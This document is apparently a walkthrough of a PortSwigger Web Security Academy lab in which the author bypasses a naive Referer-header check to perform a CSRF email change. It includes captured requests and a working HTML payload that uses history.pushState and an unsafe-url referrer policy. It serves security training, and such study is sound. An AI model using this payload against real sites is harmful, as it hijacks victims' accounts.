This lab's email change functionality is vulnerable to CSRF. It attempts to detect and block cross domain requests, but the detection mechanism can be bypassed.

To solve the lab, use your exploit server to host an HTML page that uses a [CSRF attack](https://portswigger.net/web-security/csrf) to change the viewer's email address.

You can log in to your own account using the following credentials: `wiener:peter`

[Access the lab](https://portswigger.net/academy/labs/launch/16d017d6cc0162f41ea71950a84e47e8a8b7914d65e26f917ea8fd2366287791?referrer=%2fweb-security%2fcsrf%2flab-referer-validation-broken)

# Practical
So let's login again, and check out what's happening, let's change our email and see the request.
```html
POST /my-account/change-email HTTP/1.1
Host: acb41fb01f425fe680881ef700bf00ba.web-security-academy.net
Cookie: session=wFZNGjFvUW7DkueCcWKhmf0nXoV4TfF4
Content-Length: 24
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://acb41fb01f425fe680881ef700bf00ba.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/6.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://acb41fb01f425fe680881ef700bf00ba.web-security-academy.net
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close

email=wiener@hacker2.com
```
Looks normal, we have a referrer header.
Let's removing it and see what happens.
```txt
Invalid referrer header.
````
Okay so we can't remove it or it won't go through.
How about making it a query?
```html
POST /my-account/change-email HTTP/1.1
Host: acb41fb01f425fe680881ef700bf00ba.web-security-academy.net
Cookie: session=wFZNGjFvUW7DkueCcWKhmf0nXoV4TfF4
Content-Length: 24
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://acb41fb01f425fe680881ef700bf00ba.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/6.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://exploit-acec1fab1fd85ffc80e01e34017b0026.web-security-academy.net/exploit?acb41fb01f425fe680881ef700bf00ba.web-security-academy.net
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close

email=wiener@hacker2.com
```
That seems to work but the catch here is that most browser nowadays strip the query from referrer, but this can be done by changing the referrer policy.
Okay so we have a plan in our head, let's craft our payload.

```html
<html>
<head>
</head>
  <body>
    <form action="https://acb41fb01f425fe680881ef700bf00ba.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="pwned@evil-user.net" />
    </form>
    <script>
      history.pushState("", "", "/?acb41fb01f425fe680881ef700bf00ba.web-security-academy.net")
      document.forms[0].submit();
    </script>
  </body>
</html>
```
Okay so history.pushState() basically adds an entry to our browser session.
What it basically does is append the site URL to our exploit server

https://www.javascripttutorial.net/web-apis/javascript-history-pushstate/

Take a look of this for more information.
So let's send this exploit.
```txt
Invalid referrer header.
```
So what happened is that browser strips the query from referrer header.
So to bypass this, set our referrer policy to unsafe-url in the **header**.

```html
<html>
<head>
<meta name="referrer" content="unsafe-url">
</head>
  <body>
    <form action="https://acb41fb01f425fe680881ef700bf00ba.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="pwned@evil-user.net" />
    </form>
    <script>
      history.pushState("", "", "/?acb41fb01f425fe680881ef700bf00ba.web-security-academy.net")
      document.forms[0].submit();
    </script>
  </body>
</html>
```
And we solved the lab and changed the email!